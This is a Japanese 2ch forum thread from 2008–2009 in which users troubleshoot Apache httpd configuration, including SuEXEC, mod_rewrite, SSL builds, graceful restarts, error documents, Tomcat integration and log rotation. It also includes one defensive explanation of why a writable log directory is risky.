Apache関連 Part11
レス数が950を超えています。1000を超えると書き込みができなくなります。
0001名無しさん@お腹いっぱい。
2008/09/30(火) 08:11:00http://httpd.apache.org/
●インストール済みApacheの詳細情報の調べ方
httpd -h 簡易ヘルプ
httpd -v バージョン情報
httpd -V コンパイル条件など詳細な情報
httpd -l 静的リンクされたモジュール一覧
httpd -M 現在の設定ファイルで読み込まれるモジュール(2.2以降)
●公式マニュアル
http://httpd.apache.org/docs/1.3/ Apache 1.3
http://httpd.apache.org/docs/2.0/ Apache 2.0
http://httpd.apache.org/docs/2.2/ Apache 2.2
●ディレクティブ一覧
http://httpd.apache.org/docs/1.3/mod/directives.html
http://httpd.apache.org/docs/2.0/mod/quickreference.html
http://httpd.apache.org/docs/2.2/mod/quickreference.html
前スレッド
Apache関連 Part10
http://pc11.2ch.net/test/read.cgi/unix/1179627714/
0002名無しさん@お腹いっぱい。
2008/09/30(火) 08:12:180003名無しさん@お腹いっぱい。
2008/09/30(火) 22:57:590004名無しさん@お腹いっぱい。
2008/10/02(木) 08:39:06乙
0005名無しさん@お腹いっぱい。
2008/10/07(火) 20:19:39Apache2.2.8でVirtualHost+SuEXECな環境を作りたいのです。
Apacheはuserもgroupもnobodyで動かしています。
そのためMovableTypeでHTML生成すると、ファイルのオーナーがnobodyになってしまい
これはSuEXECなるものを使えってことなのか?と試しているんですが、どうやってもnobodyでファイルが生成されてしまうのです。
/home/[ユーザ名]/public_htmlがVirtualHost個々のDocumentRootです。
./configure --prefix=/usr/local/apache2 \
--enable-so \
--enable-rule=SHARED_CORE \
--enable-rewrite \
--disable-dav \
--enable-cgi \
--with-included-apr \
--with-perl=/usr/local/bin/perl5.8.8 \
--with-port=80 \
--enable-suexec \
--with-suexec-caller=nobody \
--with-suexec-docroot=/home \
--with-suexec-userdir=public_html \
--with-suexec-bin=/usr/local/apache2/bin/suexec \
--with-suexec-logfile=/usr/local/apache2/logs/suexec_log \
--with-suexec-uidmin=1000 \
--with-suexec-gidmin=1000
configureは上記のようにしていますが、httpd_vhostとかに何かおまじないを書く必要があるんでしょうか?
もしくは他の方法でユーザ自身がオーナーになるようにできるんでしょうか?
初心者的質問で恐縮ですが、よろしくお願いします。
0006名無しさん@お腹いっぱい。
2008/10/07(火) 21:49:42/usr/local/apache2/logs/suexec_log に何かでてないの?
00075
2008/10/07(火) 22:52:34suexec -Vではconfigureの値がでてきているので
入っているのは確認できているんですが・・・
0008名無しさん@お腹いっぱい。
2008/10/07(火) 23:09:55あれ?
> /home/[ユーザ名]/public_htmlがVirtualHost個々のDocumentRootです。
これってちょっと特殊な要件だね。すまん、見逃してた。
<VirtualHost *:80>
DocumentRoot "/home/foo/public_html"
ServerName foo.example.com
</VirtualHost>
って感じ?だとすると、たぶん SuEXEC としては UserDir としての
アクセスじゃないから動かないと思う。(確かめたわけじゃないが、
かなり厳密に動作環境をチェックしてたはずなので)
おおもとのホスト名が www.example.com だとして、
まず http://www.example.com/~foo/ で SuEXEC での動作を確認し
て、http://foo.example.com/ を http://www.example.com/~foo/
にリダイレクトなり ProxyPass & ProxyPassReverse なりしてやる
のがいいんでない?
注意点としては・・・
・本当にできるかどうかわからんw
・規模が大きくなるとパフォーマンスでないかもしれん
・ProxyPass つかうと VirtualHost側に想定するログが出ないかも
(全部アクセス元が127.0.0.1とか)
・同様にIPアドレスベースでアクセス制御考えてる場合は破綻するかも
などなど。まぁがんがれ。
0009名無しさん@お腹いっぱい。
2008/10/07(火) 23:12:46>>7
> ログには何も書き出されないです。
ログが出ないことからしても、SuEXECなアクセスとして扱われてな
い可能性が高い気がするなぁ。マニュアルに SuEXEC としてアクセ
スするための条件とか書いてない?
0010名無しさん@お腹いっぱい。
2008/10/07(火) 23:24:310011名無しさん@お腹いっぱい。
2008/10/07(火) 23:34:45> SuexecUserGroup
おお、これかw
http://httpd.apache.org/docs/2.2/suexec.html#usage
>>5
>>8 は忘れていいw
00125
2008/10/07(火) 23:45:49まーさーにー、これだ!
というか、documentはスミからスミまで読みますスミマセンでした。
もうできなくてできなくて、仮想サーバを立ち上げてやろうかとか考えてました。
00135
2008/10/08(水) 10:07:14できました!
まぁお約束のdirectory is writable by othersが出て、一瞬なんでよ?と
思いましたが、そりゃOtherが触れたらsuexec意味ねーじゃんと言うことで
755にして解決です。
ありがとうございました。
0014名無しさん@お腹いっぱい。
2008/10/08(水) 21:37:29jpgはミラーサーバーへ飛ばして、xjpgはサーバー内のjpgを表示したいのですが、
RewriteRule ^(.+)\.xjpg$ /images/$1.jpg [L]
RewriteRule ^(.+)\.jpg$ http://www.mirror.xxx/images/$1.jpg
とやったら2行目まで処理されました。
[L]て、それ以上書き換えルールを適用しないおまじないじゃないんでしょうか。
xjpgはミラーになかったときに突っ返えされたやつなんで無限リダイレクト・・・
0015名無しさん@お腹いっぱい。
2008/10/09(木) 12:36:28使わないから曖昧な知識なんだけど、リクエストされたURLパスと物理的な
実ファイルを紐付ける前に、リクエストのパスを書き換えるモジュールだよね?
ってことは、
xjpgでのリクエストはRewriteRule ^(.+)\.xjpg$ /images/$1.jpgに変換して
リクエストを処理。
変換されたリクエストはRewriteRule ^(.+)\.jpg$の条件にマッチするので
ミラーにないからxjpg突っ返されて無限リダイレクト。
1回のリクエストで2行目まで処理されてるんじゃなくて
都合2回分のリクエストが発生したため、2行目まで処理されてるって
ことになってるんじゃないかと素人は思う。
001614
2008/10/09(木) 19:36:52なのに評価が止まらないので質問しました。
でも自己解決したので報告します。
.htaccessでやってたからダメでした。httpd.confに移したらOK。
.htaccessだと、[L]でとめた後にまたディレクトリを読み込んで評価しちゃうんですね。
0017名無しさん@お腹いっぱい。
2008/10/09(木) 23:50:41この質問だれか答えてください
0018名無しさん@お腹いっぱい。
2008/10/10(金) 18:40:38logresolve は、どのDNSを使っているのか?
設定するファイルも無いようなんだが。
そもそも、パソコンが使うDNSとは
一意に決まっているのか?
それはどこに設定されているの?
0019名無しさん@お腹いっぱい。
2008/10/10(金) 22:31:580020名無しさん@お腹いっぱい。
2008/10/11(土) 00:23:450021名無しさん@お腹いっぱい。
2008/10/13(月) 18:30:35Allowoverride で Fileinfoを許可したいが、
CGIやPHP、SSI
を使用させたくない、というポリシーです。
phpに関してモジュールの使用を禁止するのは
モジュール自体をoffにするしか事実上不可、であってるでしょうか?
またCGI,SSIについては
optionsを禁止しておけば、Fileinfoが使えても使用できない、
ということであってるでしょうか?
0022名無しさん@お腹いっぱい。
2008/10/13(月) 20:37:44この質問における
>CGIやPHP、SSI
CGIとPHPの違いは何?
http://httpd.apache.org/docs/2.2/ja/howto/htaccess.html
http://httpd.apache.org/docs/2.2/ja/mod/core.html#allowoverride
http://httpd.apache.org/docs/2.2/ja/mod/core.html#options
ここらへんかなぁ
おまけw
http://ja.wikipedia.org/wiki/Common_Gateway_Interface
0023名無しさん@お腹いっぱい。
2008/10/14(火) 01:44:25wとかつけてるが、全然お前理解できてないだろw
Common_Gateway_Interface って覚えたてで使いたいのか?
0024名無しさん@お腹いっぱい。
2008/10/14(火) 10:26:560025名無しさん@お腹いっぱい。
2008/10/14(火) 22:38:190026名無しさん@お腹いっぱい。
2008/10/29(水) 03:09:26現在、Nameベースのバーチャルホスト設定して
異なるドメインのサイトを2つ運用しているのですが、
今度ここにもう一つサイトを追加することになりました。
そこで質問なのですが、Apacheを再起動せずに
バーチャルホストの設定を追加することは可能でしょうか?
目的は運用中のサイトを停止させずに新規サイトを追加することなので、
バーチャルホスト以外のやり方があるならばそれでも構いません。
何か良い方法があればご教示ください。
0027名無しさん@お腹いっぱい。
2008/10/29(水) 07:20:000028名無しさん@お腹いっぱい。
2008/10/29(水) 10:54:01つーかさ、止めちゃだめなような作りにするなよ。
障害で落ちることもあるんだから。
002926
2008/10/29(水) 15:21:35どうもありがとうございます。
やはりgracefulが最善でしょうか。
さすがに別プロセスであげると管理がややこしくなるので
深夜などを狙ってgracefulで再起動することにします。
ありがとうございました。
0030名無しさん@お腹いっぱい。
2008/10/29(水) 19:46:26一瞬でも止められないサイトなら鯖を二重化するなりしとけw
0031名無しさん@お腹いっぱい。
2008/11/01(土) 00:36:09ただのgracefulよりすっきりする
ただし忙しいサーバーだとstartのときに、bind出来ないって怒られることがある(バグ)
0032名無しさん@お腹いっぱい。
2008/11/01(土) 00:43:28初心者ほどやりたがるから困る
0033名無しさん@お腹いっぱい。
2008/11/01(土) 08:42:390034名無しさん@お腹いっぱい。
2008/11/01(土) 09:14:270035名無しさん@お腹いっぱい。
2008/11/01(土) 19:41:47ちょとまて、bind出来ないってそれマジか?
OSは?Apacheのバージョンは?
0036名無しさん@お腹いっぱい。
2008/11/01(土) 20:48:14./configure --enable-rewrite=shared --enable-ssl=shared --prefix=/opt/www
するとエラーが出てきました。
configure: error: ... Error, SSL/TLS libraries were missing or unusable
解決策があれば教えてほしいです。
003735
2008/11/01(土) 21:12:52graceful-stop → start ね
タイミングによってはなるかもだね
graceful で起きるのかと勘違いしたw
0038名無しさん@お腹いっぱい。
2008/11/02(日) 00:25:50書いてあるとおりでしょ。
0039名無しさん@お腹いっぱい。
2008/11/02(日) 08:47:51ライブラリが見つけれないのかなと思って、/etc/ld.so.confにsslの
ライブラリがある場所を追記したんですけど、余り関係ないですか?
どなたかヒントをお願いします。
0040名無しさん@お腹いっぱい。
2008/11/02(日) 11:02:58openssl関連が入ってないんじゃないの?
たとえば・・・
http://oku.edu.mie-u.ac.jp/~okumura/linux/?Apache%202#m73dd07e
OSはなに?
linuxならわざわざソースから入れないでパッケージ使えば楽ジャン。
apt使用できるなら依存関係も含めてインストールしてくれるし( ・∀・)イイ!!
0041名無しさん@お腹いっぱい。
2008/11/02(日) 11:53:040042名無しさん@お腹いっぱい。
2008/11/02(日) 16:11:54openssl-develが入っていなかったぽいです。
インストール後、configureはできたんですけど、
今度はmakeで引っかかってしまいました・・・。
一旦ソースからのインストールはあきらめて、aptでやり直してみます。
アドバイスどもでした。
0043名無しさん@お腹いっぱい。
2008/11/04(火) 04:59:52http://pc11.2ch.net/test/read.cgi/tech/1100616350/625
0044名無しさん@お腹いっぱい。
2008/11/09(日) 06:00:44元のエラードキュメントを変更する方法はないでしょうか?
ドキュメントルート以下にエラードキュメントを置けず、
またhttp://でのURL指定も避けたいためです。
標準で表示されるエラードキュメント(たとえば、404 not foundとか)
は.htmlでどこかにデータがあるわけではなく、
apacheのソース自体に書き込まれてるのでしょうか?
0045名無しさん@お腹いっぱい。
2008/11/09(日) 09:36:140046名無しさん@お腹いっぱい。
2008/11/09(日) 23:28:470047名無しさん@お腹いっぱい。
2008/11/10(月) 00:55:14Apache 2.xのサンプル設定にある多言語表示用のErrorDocumentと
その前に置かれているAlias /error/を見れば解決方法はわかるよな?
0048名無しさん@お腹いっぱい。
2008/11/10(月) 02:14:19置けないという状況がまず理解できない
004944
2008/11/10(月) 19:23:37Aalias /error/ をコメントアウトしても
表示変わりません、
ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
自体をコメントアウトしても
表示されるエラーって
ソース以外どこに書いてあるのを読み込んできているんでしょうか。
0050名無しさん@お腹いっぱい。
2008/11/10(月) 20:12:31なのに何が問題なんだ?
訊きたいことをちゃんとまとめてから来るんだね
0051名無しさん@お腹いっぱい。
2008/11/10(月) 20:18:160052名無しさん@お腹いっぱい。
2008/11/10(月) 20:47:320053名無しさん@お腹いっぱい。
2008/11/10(月) 22:27:09ってエスパーしてみる
正確にはリクエストのサイズとか
いくつか条件有ったと思うけど
0054名無しさん@お腹いっぱい。
2008/11/10(月) 23:23:45http://support.microsoft.com/?scid=kb%3Bja%3B294807&x=19&y=7
0055名無しさん@お腹いっぱい。
2008/11/10(月) 23:35:11久々に笑える仕様だなあ。
0056名無しさん@お腹いっぱい。
2008/11/11(火) 01:07:49そっけなく表示される短文のエラーメッセージを
わかりやすくしようと考えたんだろうね
Internet Explorerはそういういらぬお節介が多い
時としてContent-Typeを無視するのも同じことかと
ボクが考えた親切設計〜☆とかいうのはよく吟味しないと
迷惑をかけたりヘタすりゃ脆弱性になったりもする
サービス精神が豊かすぎるつーか余計なことが大好きな人は
そういうことになってないか確認を忘れずに
0057名無しさん@お腹いっぱい。
2008/11/11(火) 01:18:140058名無しさん@お腹いっぱい。
2008/11/11(火) 14:27:03そのまま見せるものは皆無なわけだし、
IE の仕様が超絶的におかしいというわけでもないよ。
メーラーだって、550 relay denied というエラーで蹴られたとしても、
そのエラーは画面に出さずに「送れませんでした」とダイアログを
出すようなものが多いでしょ。それと同じ。
エラーページのサイズで挙動を変えるというのは変態だが。
0059名無しさん@お腹いっぱい。
2008/11/17(月) 21:32:33バーチャルホストで10サイトほど運営しています
通常のアクセスログをサイト毎に存在します
こういう場合はサイト毎にWebalizeでも使うのでしょうか
0060名無しさん@お腹いっぱい。
2008/11/18(火) 14:14:42例えば単純な大データ転送より細かなCGIプログラム処理の方がサーバ&環境にとって負荷が高いって事も多いし、
まず何を目的に負荷の調査をしたいのかがわからないとね。
0061名無しさん@お腹いっぱい。
2008/11/18(火) 14:23:15単にアクセス数を数えたいだけ?
006259
2008/11/18(火) 15:40:01サイト毎のCPU的な負荷を知りたいです。
サイト毎の load average のような。
そういったツールってありますかね?
0063名無しさん@お腹いっぱい。
2008/11/18(火) 15:42:280064名無しさん@お腹いっぱい。
2008/11/18(火) 15:47:13複数のサイトで共有して使われてるものもあるから、
そういう負荷状況を取得するのは無理。
どうしてもそういうのが欲しいのなら、バーチャルホストごとに
別プロセスで立ち上げること。名前ベースなら無理だけど。
006559
2008/11/18(火) 15:59:38なるほど、そう考えるとそうですね
ありがとうございます
ただ、一つだけ合点がいかない部分がありますので聞かせてください
レンタル鯖の xreaって、サイト毎に load average っぽいのが見られるじゃないですか
1以上が長い時間続くとサーバー停止みたいな
あれって apache + virtualhost で 名前ベースだと思うのですが、
どのように実現しているんですかね
0066名無しさん@お腹いっぱい。
2008/11/18(火) 16:02:51どこで見れんの?
0067名無しさん@お腹いっぱい。
2008/11/18(火) 16:52:59CGIWRAP使ってなんかしてるんだと思うけど俺はCGIWRAPはよくわからん。
それとアクセス数と転送良だな。
0068名無しさん@お腹いっぱい。
2008/11/18(火) 17:43:30自分もCGIの多いサイトを運営してるけどこれ一本でOK的なツールは知らない、(誰か知ってたらおしえて)
でどうしてるかというと
MRTG(snmp)でCPUとトラフィックのロードアベレージを取っていて気になる時間帯のログを分析して割り出してる
効率の良い方法とは言えないけどこれで負荷が高いサイトやCGIは有る程度特定できる。
0069名無しさん@お腹いっぱい。
2008/11/19(水) 00:04:58なんか記録撮るプログラム挟めば行けそう
007059
2008/11/19(水) 12:14:47ありがとん
0071名無しさん@お腹いっぱい。
2008/11/21(金) 03:38:03何となく制限とか簡単そうな気がする
0072名無しさん@お腹いっぱい。
2008/11/21(金) 05:18:430073名無しさん@お腹いっぱい。
2008/12/03(水) 09:06:54PHP/CGIラッパーつかってるなら実行権限はapacheやnobodyじゃなくてユーザーなわけでしょ?
なら普通に60秒ごとにでもpsのpcpuを監視するスクリプトでも書けば実現できるんじゃない?
0074名無しさん@お腹いっぱい。
2008/12/07(日) 00:19:580075名無しさん@お腹いっぱい。
2008/12/07(日) 17:31:36アルファだけあってまだまだ変なとこもあるけど
安定した追加機能もあったりする
0076名無しさん@お腹いっぱい。
2008/12/09(火) 09:51:20海外に、web server の履歴(OSやらServer) を調べられるサイトが
あったと記憶しているんだが、名前が分らない。
どなたか教えてくださいませ。
0077名無しさん@お腹いっぱい。
2008/12/09(火) 10:28:070078名無しさん@お腹いっぱい。
2008/12/14(日) 16:33:11kill -HUP をしているのですが、
ブラウザからCGIなどの処理中の場合、
CGIの処理が中断され終了してしまうことを確認しました。
これを回避する方法ってないでしょうか?
0079名無しさん@お腹いっぱい。
2008/12/14(日) 18:08:180080名無しさん@お腹いっぱい。
2008/12/14(日) 22:24:490081名無しさん@お腹いっぱい。
2008/12/15(月) 15:53:150082名無しさん@お腹いっぱい。
2008/12/15(月) 22:10:59mod_rewriteをいじってもうまくいきません。
セキュリティの対策として行なおうとしてますが、
一般的に、こうしたことはする必要ないのでしょうか?
0083名無しさん@お腹いっぱい。
2008/12/15(月) 22:24:08mod_rewriteでもmod_setenvifでも出来るよ、多分。
0085名無しさん@お腹いっぱい。
2008/12/15(月) 22:35:00てか弾くんじゃなくてHTTPSのほうにリダイレクトすりゃ親切だけどな
0086名無しさん@お腹いっぱい。
2008/12/15(月) 22:40:09リダイレクトすりゃ親切ってのは同意。
0087名無しさん@お腹いっぱい。
2008/12/16(火) 21:57:24--enable-auth-dbm
をつけてconfigureすると、環境によってデフォルトがSDBM、NDBM、GDBMなど 使える
DBMのうちのどれかになるそうです。
http://httpd.apache.org/docs/2.0/ja/mod/mod_auth_dbm.html#authdbmtype
デフォルトを、たとえばGDBMにしたい、という場合はconfigureでどういうオプションをつける
のでしょうか?
AuthDBMType GDBM
とするとGDBMが使えるのは知っています。
「デフォルトをGDBMにしたい」というのはただの興味で、自分の環境のCentOS5.2だとSDBMが
デフォルトになったので、なんでかな?という理由です。
0088名無しさん@お腹いっぱい。
2008/12/17(水) 01:00:36つ ttp://httpd.apache.org/docs/2.0/ja/programs/configure.html#packageopt
0089名無しさん@お腹いっぱい。
2008/12/17(水) 07:50:29Aに来たアクセスをそのまま
Bへ送る、みたいなことってできないでしょうか?
自サイトにアクセスがあったらWEBプログラムで
ローカルのデータベースに書き込む仕組みのため
IP変更で一時でも情報が分散するのが困るためです。
メールサーバー(postfix)はクリアできたのですが、
ウェブサーバー(apache)は方法がさっぱり分かりません
0090名無しさん@お腹いっぱい。
2008/12/17(水) 08:02:20メールは中継すればいいけど、Webはなぁ・・・w
0091名無しさん@お腹いっぱい。
2008/12/17(水) 08:07:30BにAのIPアドレスを、ARPに反応しないような方法で割り当てればいい。
0092名無しさん@お腹いっぱい。
2008/12/17(水) 08:16:07古いアドレスの方は完全に止めてしまえば、そっちにアクセスされてデータがおかしくなることもない。
無理にシームレス化させなくて、割り切った方がいんでは?
0093名無しさん@お腹いっぱい。
2008/12/17(水) 13:47:11要はグローバル-プライベートじゃなくてグローバル-グローバルの NAT。
0094名無しさん@お腹いっぱい。
2008/12/17(水) 14:53:19当面サーバAを止めずにアクセスをリダイレクトするのは?
サーバBへはhttp://1111.2222.3333.4444/
って感じでIPアドレスベースで。
その程度のライトな対応はよくやる。
0095名無しさん@お腹いっぱい。
2008/12/17(水) 20:57:42旧IPでPROXYとかどーよ
0097名無しさん@お腹いっぱい。
2008/12/17(水) 22:07:21./configure --help
と同じ内容ですよね。
で、そこのどこに「デフォルトDBMを指定するには」があるんでしょ?
関係ありそうなのは
--enable-auth-dbm
--with-gdbm[=path]
--with-ndbm[=path]
--with-berkeley-db[=path]
だけかと思うのだけど。
0098名無しさん@お腹いっぱい。
2009/01/07(水) 17:02:56VMwareで自動起動したtomcatがstopできないんだけど…
0099名無しさん@お腹いっぱい。
2009/01/07(水) 19:40:16どういうこと?
0100名無しさん@お腹いっぱい。
2009/01/08(木) 09:28:50chkconfigで2〜5がONになってて起動中のTOMCATを、/etc/init.d/tomcat stopで停めようとすると、サーバ(VMware?)がハングする
でもってchkconfigでtomcatの2〜5までOFFにすると、/etc/init.d/tomcat stopで停まる
VMwareが他の人のPCに入ってるので、その人が来るまでまだしばらく各種バージョンは確認できないんですけど。
tomcatが悪いのか、mod_jkが悪いのか、JAVAが問題なのか、はたまたVMの問題か、原因がよく判らないんですよねぇ…
0101名無しさん@お腹いっぱい。
2009/01/09(金) 22:48:04罠として仕掛けるには面白いから、どうしてサーバがハングするのか突き止めてくれw
自分の知識ではその状況が作り出せない・・・
0102名無しさん@お腹いっぱい。
2009/01/10(土) 02:19:25ご存知の方がおいででしたら、教えていただきたいのですが、
apache(1.33以上)の動作として、
HEADメソッドのリクエストに対して、100 Continueを返す
ことはあるのでしょうか?
というかごくまれに返ってくると思われるのですが、
どういった条件で返すのでしょうか?
0103名無しさん@お腹いっぱい。
2009/01/10(土) 13:04:540104名無しさん@お腹いっぱい。
2009/01/10(土) 17:47:19ファイルの転送が遅く、色々試行錯誤しております。
LAN(一応Gbit)内に置いてあるのですが、400KB/sec程となってしまいます。
お知恵を拝借したく、書き込みいたします。
FTPでは12MB/secとなります。
複数からの接続をすると、200KB/secずつになります。
CPUの負荷には変化なく、十分に余裕があるように見えます。
ProcessExplorerでディスクへのアクセスの仕方を見てみましたが、
400KB/secで安定して読み込み、変動はありません。
そのため負荷による制限ではなく、意図的な制限に見えます。
当初、EnableSendfile off にて、11MB/secになって安心していたのですが
数日後、400KB/secに戻ってしまいました。
sendbuffersize にRWINと同じ値を指定し、11MB/secとなり、
様子を見ておりましたが、再度400KB/secになってしまいました。
今回は、的外れと思いつつwindows側のTCPがらみの調整を行いましたが、改善しませんでした。
帯域制限をするモジュールや、ファイアーウォールの類はありませんので
apacheとwindows間のやり取りに何らかの障害が発生している?と思うのですが…
現象の再発性が腑に落ちません。
根本的な問題が別にあるのでしょうか…(例えばメモリーなどのHW? 無いか…)
どなたか、「これやった?」的なアドバイスが頂ければ幸甚です。
0105名無しさん@お腹いっぱい。
2009/01/16(金) 05:09:280106名無しさん@お腹いっぱい。
2009/01/17(土) 13:45:01頭から弾くようなものは無いですかね。。。
まちBBSの「Proxyと思われるポートが開いています」対策なんですけど、ルータや
IPマスカレードのレベルで実施するというのもごもっともなんですが、できればお気軽
にApacheの設定だけでできないかな、と。
0107名無しさん@お腹いっぱい。
2009/01/17(土) 14:10:230108名無しさん@お腹いっぱい。
2009/01/18(日) 15:19:090109名無しさん@お腹いっぱい。
2009/01/18(日) 16:03:400110名無しさん@お腹いっぱい。
2009/01/19(月) 15:21:24エロイ人教えてくださいませ。よろしくお願いします
0111名無しさん@お腹いっぱい。
2009/01/19(月) 22:59:01まったく、OS とか環境が無いとアドバイスのしようが無いじゃないの!
とりあえず、Linux なら Keepalive timeout を短くしてみたら!
べ・・・別に、あんたのためじゃないんだからね。
0112名無しさん@お腹いっぱい。
2009/01/20(火) 08:38:260113名無しさん@お腹いっぱい。
2009/01/21(水) 04:06:32ごめんなさい。遅れまして。OS:CentOS4.7/5 Apache 2.2.8/2.2.11 Tomcat 5.5 mod_jk, mod_proxy
lsof コマンドで確認したこと
(1) ブラウザ −> Apache
省略
CLOSE_WAIT FIN_WAIT2
両方も開放
(2)ブラウザ −> tomcat:8080
省略
CLOSE_WAIT 速く開放されて表示されない
両方も開放
(3)ブラウザ −> Apache Apache−> tomcat:8009
省略
CLOSE_WAIT FIN_WAIT2 CLOSE_WAIT 速く開放されて表示されない
両方も開放 CLOSE_WAIT
connectionTimeoutを設定しないと(0) ESTABLISEDのまま
ご指摘の時間を短くするのは、CLOSE_WAITに至る時間です。
以上です。よろしくお願いします。
0115110
2009/01/21(水) 05:20:21tomcat へ移動します。
こちらはクローズします。
0116名無しさん@お腹いっぱい。
2009/01/29(木) 20:45:50> Apache がログファイルを書いているディレクトリに書き込める人は、
> ほぼ確実にサーバが起動された uid へのアクセスを手に入れることができます。
これ具体的な事例、誰か教えてくれ
言いたいことはわかるんだけど、実際になぜ危険なのかが分かんない
0117名無しさん@お腹いっぱい。
2009/01/29(木) 22:23:28http://httpd.apache.org/docs/2.2/en/misc/security_tips.html
If the logs directory is writeable (by a non-root user), someone could replace a log file
with a symlink to some other system file, and then root might overwrite that file with arbitrary data.
0118名無しさん@お腹いっぱい。
2009/01/30(金) 12:34:22とてもわかりやすいな。
0119名無しさん@お腹いっぱい。
2009/01/30(金) 22:21:27なるほど。考えたこともなかった。
0120名無しさん@お腹いっぱい。
2009/02/02(月) 02:10:10Order Deny,Allow
Deny from all
Allow from example.jp
</Directory>
<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.com
</Directory>
みたいな書き方で、example.com, example.jp 双方から
/home/hogeへのアクセスを許可することは動作上はOKみたいなんですが、
これって正式に認められてる書き方なんるんでしょうか?
0121名無しさん@お腹いっぱい。
2009/02/02(月) 02:20:22Order Deny,Allow
Deny from all
Allow from example.jp
Order Deny,Allow
Deny from all
Allow from example.com
</Directory>
こう書いたのと等価で、さらに
<Directory /home/hoge>
Order Deny,Allow
Deny from all
Allow from example.jp
Allow from example.com
</Directory>
こう書いたのと等価だからね
正式には知らん
0122名無しさん@お腹いっぱい。
2009/02/04(水) 19:45:21CustomLog "|/usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-access_log.%Y%m%d 86400 540" combined env=!worm
とするとプロセスが
/usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-error_log.%Y%m%d 604800 540
でなく
/bin/sh -c /usr/local/apache/bin/rotatelogs /home/hoge/logs/hoge.com-error_log.%Y%m%d 604800 540
^^^^^^^^^^って頭に/bin/sh -cがくるんだけどこれって正常?
マシンによってまちまち・・・
0123名無しさん@お腹いっぱい。
2009/02/04(水) 20:20:33https://issues.apache.org/bugzilla/show_bug.cgi?id=28815
0124名無しさん@お腹いっぱい。
2009/02/04(水) 20:38:29昔からUNIX使ってる人はsymlinkアタックなんざ知ってるし、
そもそもログディレクトリに書き込める設定がおかしいw
0125名無しさん@お腹いっぱい。
2009/02/04(水) 20:40:10先頭にexecつけてみたら消えない?
昔、特定のバージョンでそういうのあって、execで逃げてた。
0126名無しさん@お腹いっぱい。
2009/02/04(水) 20:58:42空白入りのコマンドを実行しようとしてコケそうな気が。
0127122
2009/02/04(水) 21:28:12おおお。消えました。どもです。
apache_1.3.41+FreeBSD6.3なんですが、
apache_1.3.41+FreeBSD6.2だとexec無しで動いてます。
どういう理屈か追っかけてませんが、一応ご報告。
0128fa
2009/02/13(金) 21:45:22私の認識だと、設定したポートにたいして、常に親がListen状態で、forkされた子プロセスはESTABLISHになると思っています。
プロセス自体を再起動すると、認識どおりの動きをするのですが、何日か稼働させると、子プロセスがListen状態になってしまいます。
ただし、この状態になっても、アクセスは正常に出来、ログにエラーも出ていません。
0129名無しさん@お腹いっぱい。
2009/02/13(金) 22:12:470130名無しさん@お腹いっぱい。
2009/02/13(金) 23:56:27HP-UXにtomcatをインストールしてサーバ構築しています。
tomcatの起動ユーザーをroot以外のユーザーに設定して使いたいのですが、
うまく設定できずに困っております。
rootでtomcatを起動した場合は正常にページが表示できているのですが、
root以外のユーザーで起動するとページが見つかりませんと表示されてしまいます。
尚、catalina.outには以下のログがでておりました。
org.apache.coyote.http11.Http11Protocaol start
致命的:エンドポイントを起動中のエラーです。
java.net.BindException:パーミッションがありません(errno:13)<null>:80
これを見ると、どこかパーミッションを変えないとだめかと考えますが、
具体的にどこを変えていいのか分かっておりません。
ちなみに、/opt/hpws/tomcat配下のパーミッションは
起動ユーザーのもの(オーナーやグループ)に変えております。
問題がお分かりの方ご教授ください。
設定としては以下
・/opt/hpws/tomcat配下の権限(オーナー、グループ)は、起動ユーザーのもの。
0131名無しさん@お腹いっぱい。
2009/02/15(日) 13:36:58apahe2.2.6 + CentOS4.6でやってみたけどどうにも消えない。。。
0132名無しさん@お腹いっぱい。
2009/02/15(日) 13:51:290133131
2009/02/15(日) 14:56:010134名無しさん@お腹いっぱい。
2009/02/16(月) 14:47:100135131
2009/02/17(火) 00:00:290136名無しさん@お腹いっぱい。
2009/02/17(火) 01:14:08HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="hello"
というレスポンスをサーバーが返せば、
大抵のブラウザはログアウト状態になるよ。
0137名無しさん@お腹いっぱい。
2009/02/18(水) 08:36:53その後リトライさせるとパスワード覚えてて意味なしだけどな。
0138名無しさん@お腹いっぱい。
2009/02/25(水) 00:44:33ウェブサーバの管理を任されてしまった初心者です。UNIXもApacheも最近学び始めたばかりです。
現在、サーバ設定はhttpd.confに一本化されているようですが、
以前は内容ごとに複数のファイルに分かれていたと聞きました。
そこで疑問に思ったことがあります。
以下の場合、実際の運用の面で何か差はあるのでしょうか?
起動が少し遅くなるだろうな、というのは予想できるのですが。
(1) コメントがたくさんある場合と、一切無い場合
(2) httpd.confのみに設定を書いた場合と、Includeで複数のファイルに設定を分けた場合
よろしくお願いします。
0139名無しさん@お腹いっぱい。
2009/02/25(水) 02:01:08そのまんまだと思うけど。
ただ、2.2系のデフォルトの設定ファイルはIncludeするようになってるね。
extraの下にあるやつ。
0140138
2009/02/25(水) 02:12:14シンプルなタイプと、コメントが多かったりIncludeで分割しているタイプとで
実行速度や占有メモリなどに差があったら困るなあ、と。
VirtualHostの部分が結構多くなってしまったため、
もし問題ないなら、そこだけでも別ファイルに移そうかな?と思っていました。
おそらく慣れた方なら、コメントが少なくても大丈夫なのでしょうけど。
2.2のファイル構成は確認していませんでした。参考にしてみます。
0141名無しさん@お腹いっぱい。
2009/02/25(水) 02:49:43分かれてようが一つだろうが、同じ設定なら動作には関係無いっしょ
DocumentRoot下の.htaccessは動的に探して読んだりするから有無で重さが変わるかもしれないけど、昨今のハードウェアなら無視出来るかと。
0142名無しさん@お腹いっぱい。
2009/02/25(水) 10:27:450143138
2009/02/25(水) 12:38:01ですよね。良かった良かった。
大丈夫だろうとは思ってましたが、これで安心です。
>142
サンクス
0144名無しさん@お腹いっぱい。
2009/02/27(金) 02:16:39そんなことより性能系のパラメーターに力入れなよ。
0145名無しさん@お腹いっぱい。
2009/03/04(水) 00:42:19httpd が探しに行く (/usr/sbin/)suexec が存在すると有効になってしまいます。
他のモジュールのよう httpd.conf だけで無効にできないのですが、
このほうが良いという利点があってこのような動作をするのでしょうか。
0146名無しさん@お腹いっぱい。
2009/03/04(水) 01:09:14「指定されたユーザとグループで CGI スクリプトを実行する」(ドキュメントより)
為のものであって、suexecそのものが使われるか否かには関係ないのでは?
0147名無しさん@お腹いっぱい。
2009/03/06(金) 17:08:52とりあえず持っておけ!という本は何があるでしょうか?
公式サイトと併用を考えています。
